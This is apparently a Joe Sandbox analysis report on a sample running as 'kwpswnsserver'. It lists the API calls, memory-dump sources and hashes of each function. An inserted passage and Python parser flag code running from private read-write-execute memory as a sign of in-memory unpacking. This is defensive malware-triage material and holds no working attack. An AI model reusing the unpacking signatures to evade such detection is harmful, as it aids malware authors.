                                                                  • Opcode ID: f31ede52a039674af7d588bb98a9811d88c71c5d475e8485c1c656d63179ced4
                                                                  • Instruction ID: 6bbbee1de2771004db2767ce15c22c7c7f41cd017dd500230776ef1ff38ec62f
                                                                  • Opcode Fuzzy Hash: f31ede52a039674af7d588bb98a9811d88c71c5d475e8485c1c656d63179ced4
                                                                  • Instruction Fuzzy Hash: 2DB11DB4904314CFCB24EF68C9547DDBBB0BF45304F4089AAD4199B790EB759A89CF92
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleProcess32$ByteCharCreateFirstMultiNextSnapshotToolhelp32Wide
                                                                  • String ID:
                                                                  • API String ID: 199250714-0
                                                                  • Opcode ID: ff44fb5004fe65500b73c4e017eec25061cd116eba0c9ab467872abb5a7cf602
                                                                  • Instruction ID: 2f365c41af5e977bc8925aad4a084b7dc9389c041201689d2501a3c622994a4c
                                                                  • Opcode Fuzzy Hash: ff44fb5004fe65500b73c4e017eec25061cd116eba0c9ab467872abb5a7cf602
                                                                  • Instruction Fuzzy Hash: 2C51F6B09083589FDB25DF68C94479DBBF8AB05304F0489EAD498A7740E7359B89CF52
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 0427669B
                                                                  • CoCreateInstance.OLE32(042946FC,00000000,00000001,0429471C,?,?,?,?,?,?,?,?,?,?,0427588A), ref: 042766B2
                                                                  • SysFreeString.OLEAUT32(?), ref: 0427674C
                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0427588A), ref: 0427677D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                  • String ID: FriendlyName
                                                                  • API String ID: 841178590-3623505368
                                                                  • Opcode ID: 5d5c8059d645e97b33b70778b3250d9308ac8665fbf1663aa8d7724fb78d34ab
                                                                  • Instruction ID: a1d77dddfa4f6f589c2aa26e89c684f527b2ee66c99fa1dd8c602185c52611c2
                                                                  • Opcode Fuzzy Hash: 5d5c8059d645e97b33b70778b3250d9308ac8665fbf1663aa8d7724fb78d34ab
                                                                  • Instruction Fuzzy Hash: 3B312875B1060AAFDB00DB99DC84EAEB7B9EF88714F148598E504EB250DA71FD02CB60
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 0427F721
                                                                    • Part of subcall function 0427F673: __FF_MSGBANNER.LIBCMT ref: 0427F68C
                                                                    • Part of subcall function 0427F673: __NMSG_WRITE.LIBCMT ref: 0427F693
                                                                    • Part of subcall function 0427F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04284500,00000000,00000001,00000000,?,04288DE6,00000018,04296448,0000000C,04288E76), ref: 0427F6B8
                                                                  • std::exception::exception.LIBCMT ref: 0427F756
                                                                  • std::exception::exception.LIBCMT ref: 0427F770
                                                                  • __CxxThrowException@8.LIBCMT ref: 0427F781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                  • String ID: bad allocation
                                                                  • API String ID: 615853336-2104205924
                                                                  • Opcode ID: df8c9b4b505d773d37c3917523adad60aa0864fbfcff43910bb71e92174d5b99
                                                                  • Instruction ID: e34b2905ee8ab85fb0980c36636c968a6937df9e96cda3c5f0cc7868e4e564ac
                                                                  • Opcode Fuzzy Hash: df8c9b4b505d773d37c3917523adad60aa0864fbfcff43910bb71e92174d5b99
                                                                  • Instruction Fuzzy Hash: 38F0D171B3420AABEF44EF58EA34A6E37E8AB45258F160099E414D60D0DFB0FE058A91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CopyFile$CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 3066332969-0
                                                                  • Opcode ID: fc113416317a8bcc15ddf47cbc1a784980858a966dadcb2b70d70744ebbf74d4
                                                                  • Instruction ID: 231f38de71245201f498f3a4fb8a826e18863646ef3d5e6aa430fab6361329cb
                                                                  • Opcode Fuzzy Hash: fc113416317a8bcc15ddf47cbc1a784980858a966dadcb2b70d70744ebbf74d4
                                                                  • Instruction Fuzzy Hash: 9EE105B0505B00CFD365DF29C6987D6BBE0BF45308F808D2DD4AA4BB61DB71A949CB92
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                  • String ID:
                                                                  • API String ID: 3136044242-0
                                                                  • Opcode ID: 885250a5a9e75f9efa5da7bcec5b4747ae1ed0be007d0ae830432ccf68a544bf
                                                                  • Instruction ID: 0f85a310ced95496f9cd81350f4d94852c8c73349a872f226c87c6707ee72f6a
                                                                  • Opcode Fuzzy Hash: 885250a5a9e75f9efa5da7bcec5b4747ae1ed0be007d0ae830432ccf68a544bf
                                                                  • Instruction Fuzzy Hash: 98217171F01615EBCB218E55CC44EAF3A7DEBA6A98B118116F81467B10C330CD118BA7
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Shell32,00000000,?,6C87CD8A), ref: 6C89A67C
                                                                  • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 6C89A68D
                                                                  Strings
                                                                  • SetCurrentProcessExplicitAppUserModelID, xrefs: 6C89A687
                                                                  • Shell32, xrefs: 6C89A675
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32
                                                                  • API String ID: 1646373207-2658420654
                                                                  • Opcode ID: f1fd2154cd3b2c09c1aa0c4a21940aaa167bc9f5deee36c6582a9ff4f9fce484
                                                                  • Instruction ID: ed0236fd7e651d8e4fda7bb5f49160e923800a3b1590cf7184b5b5758763b71b
                                                                  • Opcode Fuzzy Hash: f1fd2154cd3b2c09c1aa0c4a21940aaa167bc9f5deee36c6582a9ff4f9fce484
                                                                  • Instruction Fuzzy Hash: C6E04F31B017396B8A296B69DD2C85B7BA8EA916A6340852AF909C3600DB20DD01C6A4
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C88948F
                                                                    • Part of subcall function 6C8982A0: __EH_prolog3.LIBCMT ref: 6C8982A7
                                                                  • GetCurrentThread.KERNEL32 ref: 6C8894EE
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8894F7
                                                                  • GetVersionExW.KERNEL32 ref: 6C889593
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$H_prolog3H_prolog3_Version
                                                                  • String ID:
                                                                  • API String ID: 786120064-0
                                                                  • Opcode ID: 88ae526b58057e5468aa53967c101694c7679628fb1d9541e7e9fb112485fbe7
                                                                  • Instruction ID: df06c2e4d575a0d71b3ae8de200185f9be41de74d4d4ec320d2d30416f9eb580
                                                                  • Opcode Fuzzy Hash: 88ae526b58057e5468aa53967c101694c7679628fb1d9541e7e9fb112485fbe7
                                                                  • Instruction Fuzzy Hash: 9851E5B0A01B158FD725CF6A868468AFBF1BF49304F508A6ED59EC7B50DB30A945CF40
                                                                  APIs
                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 6C89E314
                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 6C89E31C
                                                                  • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C89E32D
                                                                  • GetSystemMetrics.USER32(00001000), ref: 6C89E33E
                                                                    • Part of subcall function 6C89E374: __EH_prolog3.LIBCMT ref: 6C89E37B
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000016), ref: 6C89E384
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000F), ref: 6C89E397
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000015), ref: 6C89E3AE
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000F), ref: 6C89E3BA
                                                                    • Part of subcall function 6C89E374: GetDeviceCaps.GDI32(?,0000000C), ref: 6C89E3E2
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000F), ref: 6C89E3F0
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000010), ref: 6C89E3FE
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000015), ref: 6C89E40C
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000016), ref: 6C89E41A
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000014), ref: 6C89E428
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000012), ref: 6C89E436
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000011), ref: 6C89E444
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000006), ref: 6C89E44F
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000D), ref: 6C89E45A
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000E), ref: 6C89E465
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000005), ref: 6C89E470
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000008), ref: 6C89E47E
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000009), ref: 6C89E489
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000007), ref: 6C89E494
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000002), ref: 6C89E49F
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000003), ref: 6C89E4AA
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000001B), ref: 6C89E4B8
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000001C), ref: 6C89E4C6
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000A), ref: 6C89E4D4
                                                                    • Part of subcall function 6C89E792: __EH_prolog3_GS.LIBCMT ref: 6C89E79C
                                                                    • Part of subcall function 6C89E792: GetDeviceCaps.GDI32(?,00000058), ref: 6C89E7BC
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E818
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E836
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E854
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E872
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E890
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E8AE
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E8CC
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E8EA
                                                                    • Part of subcall function 6C89ECB1: GetSystemMetrics.USER32(00000031), ref: 6C89ECBF
                                                                    • Part of subcall function 6C89ECB1: GetSystemMetrics.USER32(00000032), ref: 6C89ECCD
                                                                    • Part of subcall function 6C89ECB1: SetRectEmpty.USER32(?), ref: 6C89ECE0
                                                                    • Part of subcall function 6C89ECB1: EnumDisplayMonitors.USER32(00000000,00000000,6C89F489,?,?,?), ref: 6C89ECF0
                                                                    • Part of subcall function 6C89ECB1: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C89ECFF
                                                                    • Part of subcall function 6C89ECB1: SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6C89ED2C
                                                                    • Part of subcall function 6C89ECB1: SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6C89ED40
                                                                    • Part of subcall function 6C89ECB1: SystemParametersInfoW.USER32(0000100A,00000000,?,00000000), ref: 6C89ED66
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Color$DeleteObject$System$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
                                                                  • String ID:
                                                                  • API String ID: 2442922003-0
                                                                  • Opcode ID: eda10dffa556edda52d64fc830cb76b0b10228b24ecc839df2722051447cd426
                                                                  • Instruction ID: 80f5076fb8112c64c885063f7195de45c769bda16c4caa14132b0574f27f0397
                                                                  • Opcode Fuzzy Hash: eda10dffa556edda52d64fc830cb76b0b10228b24ecc839df2722051447cd426
                                                                  • Instruction Fuzzy Hash: 4F1194B1A00318ABDB349F75DC55BEA7BBCAB89708F00456DA145D2280DB745A458B90
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0427316B
                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 04273183
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0427322F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                   • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 4033114805-0
                                                                  • Opcode ID: 194873bfbc357a62b95ccdc07388b1e4edfac0ed9c91f50a83259bc304fd627d
                                                                  • Instruction ID: 3928527590657219f165309a434edfe8d9c975497e48f09843f1c78b2682b6eb
                                                                  • Opcode Fuzzy Hash: 194873bfbc357a62b95ccdc07388b1e4edfac0ed9c91f50a83259bc304fd627d
                                                                  • Instruction Fuzzy Hash: BC318770320602AFD728DF69C884A6AB3E4FF44348B10C56CE91ACB615EB31FC41DB90
                                                                  APIs
                                                                  • __floor_pentium4.LIBCMT ref: 042711E9
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04271226
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04271255
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                   • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                  • String ID:
                                                                  • API String ID: 2605973128-0
                                                                  • Opcode ID: f15b21570deef90dbebdec3c1b00720d9b26ec100a3d10530557ed47c9d2fb86
                                                                  • Instruction ID: fac95313fe3c188f3ec5c499d6060e337660a498c67feb89a86cb7aa475777aa
                                                                  • Opcode Fuzzy Hash: f15b21570deef90dbebdec3c1b00720d9b26ec100a3d10530557ed47c9d2fb86
                                                                  • Instruction Fuzzy Hash: CE218E71B10609AFDB149FAEE845B6EBBF8EF40705F0089ADE959A2640EA74BC508750
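The records above are Joe Sandbox per-function fingerprints: the resolved API calls with their static arguments and call-site address, the memory dump the function was recovered from, and the opcode and fuzzy hashes. The security-relevant detail hides in the dump file name. The functions calling VirtualAlloc/VirtualFree, GdiplusStartup and GetCurrentThreadId/InterlockedExchange come from the 0x04270000 region, whose name carries protection 00000040 and type 00020000, while the DLL code at 0x6C850000 carries 00000020 and 01000000. Read as the winnt.h constants, that is PAGE_EXECUTE_READWRITE private memory versus PAGE_EXECUTE_READ image-backed memory, which is exactly the "creates a PE file in dynamic memory" unpacking signature from the report summary. The following parser, added here and not part of the report or of Joe Sandbox, turns these records into structured data and flags the functions that live in private RWX memory. The decoding of the .sdmp name as pid.run.timestamp.base.protect.state.type.n is an assumption; the sample input is an abridged copy of three records from this page, including one "Download File" link residue the parser tolerates.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records and flag the ones
whose code lives in a private RWX region (the in-memory unpacked stage).

Added example, not Joe Sandbox code. ASSUMPTION: the .sdmp name is
pid.run.timestamp.base.protect.state.type.n, with protect/type holding the
winnt.h page-protection and MEMORY_BASIC_INFORMATION.Type constants."""
import re
from dataclasses import dataclass, field

PAGE_READWRITE = 0x04          # winnt.h constants
PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

# "• [Part of subcall function X: ]Name.MODULE(args), ref: ADDR" (args optional)
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
SRC_RE = re.compile(
    r"^•\s*Source File:\s*\d+\.\d+\.\d+\.(?P<base>[0-9A-F]+)\.(?P<prot>[0-9A-F]+)\."
    r"[0-9A-F]+\.(?P<type>[0-9A-F]+)\.[0-9A-F]+\.sdmp,\s*Offset:\s*[0-9A-F]+,"
    r"\s*based on PE:\s*(?P<pe>true|false)")
OPCODE_RE = re.compile(r"^•\s*Opcode ID:\s*(?P<id>[0-9a-f]{64})")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list        # raw hex strings; '?' = not resolved statically
    ref: int          # call-site address
    subcall: bool     # reported from a callee rather than this function


@dataclass
class FunctionBlock:
    opcode_id: str = ""
    base: int = 0
    protect: int = 0
    mem_type: int = 0
    based_on_pe: bool = False
    apis: list = field(default_factory=list)

    @property
    def private_rwx(self) -> bool:
        return self.protect == PAGE_EXECUTE_READWRITE and self.mem_type == MEM_PRIVATE

    @property
    def image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE


def parse_blocks(text: str) -> list:
    """One FunctionBlock per record; a record ends at its Instruction Fuzzy Hash."""
    blocks, cur = [], FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip().replace("Download File", "")   # strip page link residue
        if m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), bool(m["sub"])))
        elif m := SRC_RE.match(line):
            cur.base, cur.protect = int(m["base"], 16), int(m["prot"], 16)
            cur.mem_type, cur.based_on_pe = int(m["type"], 16), m["pe"] == "true"
        elif m := OPCODE_RE.match(line):
            cur.opcode_id = m["id"]
        elif line.startswith("• Instruction Fuzzy Hash:"):
            if cur.base:            # drop a leading partial record
                blocks.append(cur)
            cur = FunctionBlock()
    return blocks


def staging_allocs(block: FunctionBlock) -> list:
    """Call sites of VirtualAlloc(_, _, MEM_COMMIT, PAGE_READWRITE): the
    function commits fresh writable memory, a loader's usual first step."""
    out = []
    for a in block.apis:
        if a.name == "VirtualAlloc" and len(a.args) == 4:
            try:
                commit, prot = int(a.args[2], 16), int(a.args[3], 16)
            except ValueError:      # unresolved '?' argument
                continue
            if commit & MEM_COMMIT and prot == PAGE_READWRITE:
                out.append(a.ref)
    return out


def triage(blocks: list) -> dict:
    """Split the report's functions into image-backed DLL code and code that
    exists only in private RWX memory, plus every staging allocation found."""
    return {
        "private_rwx": [b.opcode_id for b in blocks if b.private_rwx],
        "image_backed": [b.opcode_id for b in blocks if b.image_backed],
        "staging_allocs": [hex(r) for b in blocks for r in staging_allocs(b)],
    }


# Constructed sample: three records abridged from this report page.
SAMPLE = """\
APIs
  • Part of subcall function 6C9E1CA4: GetConsoleOutputCP.KERNEL32(E343E0B4,00000000,00000000,?), ref: 6C9E1D07
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6C9D4A95,?), ref: 6C9E1A7F
• GetLastError.KERNEL32(?,6C9D4A95,?,6C9D4CD9,00000000,?,00000000,6C9D4CD9,?,00000000,00000000,6CA4F8C8,0000002C,6C9D4BC5,?), ref: 6C9E1A89
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
• Opcode ID: 7da5aacb15726209fd54c7380641ae9b78192955a3506226568b0388b1955b1a
• Instruction Fuzzy Hash: 1761A472D0411AAFDF02DFA8D884EEEBBBAAF2F308F144145E914A7656D331D905CB60
APIs
• __floor_pentium4.LIBCMT ref: 042711E9
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04271226
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04271255
Memory Dump Source
• Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Opcode ID: f15b21570deef90dbebdec3c1b00720d9b26ec100a3d10530557ed47c9d2fb86
• Instruction Fuzzy Hash: CE218E71B10609AFDB149FAEE845B6EBBF8EF40705F0089ADE959A2640EA74BC508750
APIs
• DeleteFileW.KERNEL32(6C9D6201,?,6C9D6201,00000007), ref: 6C9E3201
• GetLastError.KERNEL32(?,6C9D6201,00000007), ref: 6C9E320B
• __dosmaperr.LIBCMT ref: 6C9E3212
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Opcode ID: 817b39c03b8b657559854391f83b1273a3d71a8edade32f3451ae40cca118a0b
• Instruction Fuzzy Hash: E0D0123224871A67CF142AFAEC0C41B3BACEF9277D3148721F86CC56A0EF36C4529951
"""

if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        tag = "PRIVATE-RWX" if b.private_rwx else "image"
        print(f"{b.opcode_id[:12]} base={b.base:#x} {tag}: {[a.name for a in b.apis]}")
```

Feeding the full report text through `parse_blocks` groups every function by region, so the reader can list only the APIs reachable from the private RWX stage and ignore the MFC/CRT noise coming from the image-backed DLL. Because the report records static arguments, `staging_allocs` cannot see sizes passed in registers (the `?` entries); it only flags allocations whose commit and protection flags were constants at the call site.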
                                                                  APIs
                                                                  • __floor_pentium4.LIBCMT ref: 0427112F
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0427115F
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04271192
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                   • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                  • String ID:
                                                                  • API String ID: 2605973128-0
                                                                  • Opcode ID: 75d13ac82dee8e11c5699fc593d40c1cdb885a971af8ae57b564c1d726c8003e
                                                                  • Instruction ID: 1f411f5526a7986ad7c237265850539c0659df8b62073e94b017bd35f064273e
                                                                  • Opcode Fuzzy Hash: 75d13ac82dee8e11c5699fc593d40c1cdb885a971af8ae57b564c1d726c8003e
                                                                  • Instruction Fuzzy Hash: 9C11D371F10309AFDB109FA9DC86B6EFBF8EF04745F008869ED59E7240EA74A8108710
                                                                  APIs
